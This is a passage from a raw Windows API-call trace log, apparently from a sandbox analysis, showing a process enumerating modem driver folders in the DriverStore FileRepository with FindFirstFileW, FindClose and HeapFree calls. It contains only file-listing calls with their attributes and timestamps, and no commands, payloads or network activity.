nFileSizeLow=0x0, dwReserved0=0x1d2de32, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x71da50 [0060.715] FindClose (in: hFindFile=0x71da50 | out: hFindFile=0x71da50) returned 1 [0060.716] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x72aef0 | out: hHeap=0x6e0000) returned 1 [0060.720] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\mdmelsa.inf_amd64_neutral_374f9d31af832d6b\\*", lpFindFileData=0x72aef0 | out: lpFindFileData=0x72aef0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4af86315, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x67ea7eca, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x67ea7eca, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d2de32, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x71da50 [0060.721] FindClose (in: hFindFile=0x71da50 | out: hFindFile=0x71da50) returned 1 [0060.721] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x72aef0 | out: hHeap=0x6e0000) returned 1 [0060.721] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\mdmeric.inf_amd64_neutral_27c5b45728cc9ed0\\*", lpFindFileData=0x72aef0 | out: lpFindFileData=0x72aef0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4b090cb7, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x6817b8f0, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x6817b8f0, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d2de32, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x71da50 [0060.721] FindClose (in: hFindFile=0x71da50 | out: hFindFile=0x71da50) returned 1 [0060.721] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x72aef0 | out: hHeap=0x6e0000) returned 1 [0060.722] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\mdmeric2.inf_amd64_neutral_a0575ec9ce5c7de9\\*", lpFindFileData=0x72aef0 | out: lpFindFileData=0x72aef0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4b129238, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x681a1a50, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x681a1a50, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d2de32, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x71da50 [0060.722] FindClose (in: hFindFile=0x71da50 | out: hFindFile=0x71da50) returned 1 [0060.722] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x72aef0 | out: hHeap=0x6e0000) returned 1 [0060.722] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\mdmetech.inf_amd64_neutral_230358eeb58f0b3b\\*", lpFindFileData=0x72aef0 | out: lpFindFileData=0x72aef0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4b20da7a, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x681c7bb0, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x681c7bb0, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d2de32, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x71da50 [0060.722] FindClose (in: hFindFile=0x71da50 | out: hFindFile=0x71da50) returned 1 [0060.723] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x72aef0 | out: hHeap=0x6e0000) returned 1 [0060.723] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\mdmfj2.inf_amd64_neutral_9c9eb67d406a1632\\*", lpFindFileData=0x72aef0 | out: lpFindFileData=0x72aef0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4b2cc15b, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x681edd10, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x681edd10, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d2de32, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x71da50 [0060.723] FindClose (in: hFindFile=0x71da50 | out: hFindFile=0x71da50) returned 1 [0060.723] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x72aef0 | out: hHeap=0x6e0000) returned 1 [0060.723] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\mdmgatew.inf_amd64_neutral_84eee4cc19fd00dc\\*", lpFindFileData=0x72aef0 | out: lpFindFileData=0x72aef0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4b3d6afd, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x68213e71, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x68213e71, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d2de32, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x71da50 [0060.724] FindClose (in: hFindFile=0x71da50 | out: hFindFile=0x71da50) returned 1 [0060.724] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x72aef0 | out: hHeap=0x6e0000) returned 1 [0060.724] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\mdmgcs.inf_amd64_neutral_aafcd45e4e890862\\*", lpFindFileData=0x72aef0 | out: lpFindFileData=0x72aef0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4b4bb33f, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x68260131, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x68260131, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d2de32, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x71da50 [0060.724] FindClose (in: hFindFile=0x71da50 | out: hFindFile=0x71da50) returned 1 [0060.724] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x72aef0 | out: hHeap=0x6e0000) returned 1 [0060.724] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\mdmgen.inf_amd64_neutral_7a967d06d569b1e4\\*", lpFindFileData=0x72aef0 | out: lpFindFileData=0x72aef0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4b59fb81, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x68286292, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x68286292, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d2de32, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x71da50 [0060.725] FindClose (in: hFindFile=0x71da50 | out: hFindFile=0x71da50) returned 1 [0060.725] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x72aef0 | out: hHeap=0x6e0000) returned 1 [0060.725] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\mdmgl001.inf_amd64_neutral_9209e816461a1a73\\*", lpFindFileData=0x72aef0 | out: lpFindFileData=0x72aef0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x47580a6b, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x6610ccf4, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x6610ccf4, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d2de32, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x71da50 [0060.725] FindClose (in: hFindFile=0x71da50 | out: hFindFile=0x71da50) returned 1 [0060.726] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x72aef0 | out: hHeap=0x6e0000) returned 1 [0060.726] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\mdmgl002.inf_amd64_neutral_e204d4267d752eb7\\*", lpFindFileData=0x72aef0 | out: lpFindFileData=0x72aef0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4768b40c, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x66158fb4, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x66158fb4, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d2de32, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x71da50 [0060.726] FindClose (in: hFindFile=0x71da50 | out: hFindFile=0x71da50) returned 1 [0060.727] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x72aef0 | out: hHeap=0x6e0000) returned 1 [0060.727] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\mdmgl003.inf_amd64_neutral_4c78da9e48068043\\*", lpFindFileData=0x72aef0 | out: lpFindFileData=0x72aef0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4776fc4e, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x661a5275, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x661a5275, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d2de32, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x71da50 [0060.727] FindClose (in: hFindFile=0x71da50 | out: hFindFile=0x71da50) returned 1 [0060.727] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x72aef0 | out: hHeap=0x6e0000) returned 1 [0060.728] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\mdmgl004.inf_amd64_neutral_1874f16002601f78\\*", lpFindFileData=0x72aef0 | out: lpFindFileData=0x72aef0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x47e6dcfb, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x6642c9da, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x6642c9da, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d2de32, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x71da50 [0060.728] FindClose (in: hFindFile=0x71da50 | out: hFindFile=0x71da50) returned 1 [0060.728] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x72aef0 | out: hHeap=0x6e0000) returned 1 [0060.728] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\mdmgl005.inf_amd64_neutral_8b56291bfd2a4061\\*", lpFindFileData=0x72aef0 | out: lpFindFileData=0x72aef0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x48356a64, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x66857061, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x66857061, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d2de32, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x71da50 [0060.728] FindClose (in: hFindFile=0x71da50 | out: hFindFile=0x71da50) returned 1 [0060.728] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x72aef0 | out: hHeap=0x6e0000) returned 1 [0060.728] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\mdmgl006.inf_amd64_neutral_e5693eb731048022\\*", lpFindFileData=0x72aef0 | out: lpFindFileData=0x72aef0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x48487566, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x668a3322, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x668a3322, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d2de32, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x71da50 [0060.729] FindClose (in: hFindFile=0x71da50 | out: hFindFile=0x71da50) returned 1 [0060.729] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x72aef0 | out: hHeap=0x6e0000) returned 1 [0060.729] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\mdmgl007.inf_amd64_neutral_935cd017fcb965ee\\*", lpFindFileData=0x72aef0 | out: lpFindFileData=0x72aef0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x485de1c9, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x6693b8a3, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x6693b8a3, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d2de32, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x71da50 [0060.729] FindClose (in: hFindFile=0x71da50 | out: hFindFile=0x71da50) returned 1 [0060.729] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x72aef0 | out: hHeap=0x6e0000) returned 1 [0060.729] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\mdmgl008.inf_amd64_neutral_d225e15af1a594cd\\*", lpFindFileData=0x72aef0 | out: lpFindFileData=0x72aef0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x486e8b6b, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x66987b63, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x66987b63, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d2de32, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x71da50 [0060.730] FindClose (in: hFindFile=0x71da50 | out: hFindFile=0x71da50) returned 1 [0060.730] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x72aef0 | out: hHeap=0x6e0000) returned 1 [0060.730] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\mdmgl009.inf_amd64_neutral_bed6224f27f5c478\\*", lpFindFileData=0x72aef0 | out: lpFindFileData=0x72aef0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4881966d, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x669f9f84, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x669f9f84, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d2de32, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x71da50 [0060.730] FindClose (in: hFindFile=0x71da50 | out: hFindFile=0x71da50) returned 1 [0060.730] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x72aef0 | out: hHeap=0x6e0000) returned 1 [0060.730] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\mdmgl010.inf_amd64_neutral_46f466c9e68abb4a\\*", lpFindFileData=0x72aef0 | out: lpFindFileData=0x72aef0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x489702cf, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x66a6c3a5, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x66a6c3a5, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d2de32, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x71da50 [0060.731] FindClose (in: hFindFile=0x71da50 | out: hFindFile=0x71da50) returned 1 [0060.731] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x72aef0 | out: hHeap=0x6e0000) returned 1 [0060.731] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\mdmgsm.inf_amd64_neutral_dd3fbd8c64c7c87d\\*", lpFindFileData=0x72aef0 | out: lpFindFileData=0x72aef0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4b6843c2, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x682f86b2, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x682f86b2, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d2de32, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x71da50 [0060.731] FindClose (in: hFindFile=0x71da50 | out: hFindFile=0x71da50) returned 1 [0060.731] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x72aef0 | out: hHeap=0x6e0000) returned 1 [0060.731] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\mdmhaeu.inf_amd64_neutral_6611a858035bf482\\*", lpFindFileData=0x72aef0 | out: lpFindFileData=0x72aef0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4b71c943, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x6831e813, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x6831e813, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d2de32, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x71da50 [0060.732] FindClose (in: hFindFile=0x71da50 | out: hFindFile=0x71da50) returned 1 [0060.732] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x72aef0 | out: hHeap=0x6e0000) returned 1 [0060.732] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\mdmhandy.inf_amd64_neutral_386661b46df6da3f\\*", lpFindFileData=0x72aef0 | out: lpFindFileData=0x72aef0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4b7db025, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x6836aad3, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x6836aad3, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d2de32, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x71da50 [0060.732] FindClose (in: hFindFile=0x71da50 | out: hFindFile=0x71da50) returned 1 [0060.732] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x72aef0 | out: hHeap=0x6e0000) returned 1 [0060.733] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\mdmhay2.inf_amd64_neutral_ff250f861d941dd8\\*", lpFindFileData=0x72aef0 | out: lpFindFileData=0x72aef0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4b8bf866, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x683b6d94, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x683b6d94, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d2de32, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x71da50 [0060.733] FindClose (in: hFindFile=0x71da50 | out: hFindFile=0x71da50) returned 1 [0060.733] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x72aef0 | out: hHeap=0x6e0000) returned 1 [0060.737] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\mdmhayes.inf_amd64_neutral_507db5d34d7acddc\\*", lpFindFileData=0x72aef0 | out: lpFindFileData=0x72aef0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4b9f0369, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x68618398, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x68618398, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d2de32, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x71da50 [0060.737] FindClose (in: hFindFile=0x71da50 | out: hFindFile=0x71da50) returned 1 [0060.737] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x72aef0 | out: hHeap=0x6e0000) returned 1 [0060.737] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\mdminfot.inf_amd64_neutral_fc6bcd80e9e6a3c3\\*", lpFindFileData=0x72aef0 | out: lpFindFileData=0x72aef0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4bad4baa, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x68664659, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x68664659, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d2de32, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x71da50 [0060.738] FindClose (in: hFindFile=0x71da50 | out: hFindFile=0x71da50) returned 1 [0060.738] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x72aef0 | out: hHeap=0x6e0000) returned 1 [0060.738] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\mdmiodat.inf_amd64_neutral_839e9ee1a8736613\\*", lpFindFileData=0x72aef0 | out: lpFindFileData=0x72aef0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4bbdf54c, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x6889fafd, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x6889fafd, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d2de32, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x71da50 [0060.738] FindClose (in: hFindFile=0x71da50 | out: hFindFile=0x71da50) returned 1 [0060.738] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x72aef0 | out: hHeap=0x6e0000) returned 1 [0060.738] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\mdmirmdm.inf_amd64_neutral_fadec14b0a37b637\\*", lpFindFileData=0x72aef0 | out: lpFindFileData=0x72aef0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x39b8ca79, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x5f6ad510, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x5f6ad510, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d2de32, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x71da50 [0060.739] FindClose (in: hFindFile=0x71da50 | out: hFindFile=0x71da50) returned 1 [0060.740] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x72aef0 | out: hHeap=0x6e0000) returned 1 [0060.740] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\mdmisdn.inf_amd64_neutral_061c61abd3904560\\*", lpFindFileData=0x72aef0 | out: lpFindFileData=0x72aef0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4bc9dc2e, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x688c5c5d, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x688c5c5d, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d2de32, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x71da50 [0060.740] FindClose (in: hFindFile=0x71da50 | out: hFindFile=0x71da50) returned 1 [0060.740] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x72aef0 | out: hHeap=0x6e0000) returned 1 [0060.740] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\mdmjf56e.inf_amd64_neutral_328dabbf0aeed9bc\\*", lpFindFileData=0x72aef0 | out: lpFindFileData=0x72aef0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4bd8246f, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x68911f1e, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x68911f1e, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d2de32, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x71da50 [0060.741] FindClose (in: hFindFile=0x71da50 | out: hFindFile=0x71da50) returned 1 [0060.741] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x72aef0 | out: hHeap=0x6e0000) returned 1 [0060.741] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\mdmke.inf_amd64_neutral_3e4daa83122b1559\\*", lpFindFileData=0x72aef0 | out: lpFindFileData=0x72aef0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4be1a9f0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x68911f1e, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x68911f1e, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d2de32, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x71da50 [0060.741] FindClose (in: hFindFile=0x71da50 | out: hFindFile=0x71da50) returned 1 [0060.742] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x72aef0 | out: hHeap=0x6e0000) returned 1 [0060.742] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\mdmkortx.inf_amd64_neutral_1975687236603184\\*", lpFindFileData=0x72aef0 | out: lpFindFileData=0x72aef0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4bed90d2, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x6893807e, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x6893807e, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d2de32, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x71da50 [0060.742] FindClose (in: hFindFile=0x71da50 | out: hFindFile=0x71da50) returned 1 [0060.742] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x72aef0 | out: hHeap=0x6e0000) returned 1 [0060.742] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\mdmlasat.inf_amd64_neutral_bc1469ba40fe2114\\*", lpFindFileData=0x72aef0 | out: lpFindFileData=0x72aef0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4bf71653, ftCreationTime.dwHighDateTime=0x1ca0444, 